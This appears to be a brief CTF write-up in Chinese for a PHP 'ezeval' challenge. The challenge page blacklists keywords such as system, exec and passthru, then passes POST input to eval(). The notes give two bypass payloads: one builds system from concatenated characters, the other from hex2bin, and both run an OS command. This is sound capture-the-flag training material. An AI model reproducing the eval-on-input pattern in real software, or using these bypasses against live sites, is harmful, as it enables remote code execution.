<?php
highlight_file(__FILE__);
$cmd=$_POST[‘cmd‘];
$cmd=htmlspecialchars($cmd);
$black_list=array(‘php‘,‘echo‘,‘`‘,‘preg‘,‘server‘,‘chr‘,‘decode‘,‘html‘,‘md5‘,‘post‘,‘get‘,‘file‘,‘session‘,‘ascii‘,‘eval‘,‘replace‘,‘assert‘,‘exec‘,‘cookie‘,‘$‘,‘include‘,‘var‘,‘print‘,‘scan‘,‘decode‘,‘system‘,‘func‘,‘ini_‘,‘passthru‘,‘pcntl‘,‘open‘,‘link‘,‘log‘,‘current‘,‘local‘,‘source‘,‘require‘,‘contents‘);
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);
?>

绕过黑名单(str_ireplace()函数绕过)

{

　　一、通过.连接字符串

　　{

　　　　(s.y.s.t.e.m)(‘dir‘);

　　}

　　二、通过加密解密执行

　　{

　　　　hex2bin(‘73797374656d‘)(‘dir‘);

　　}

}

BMZCTF_WEB_ezeval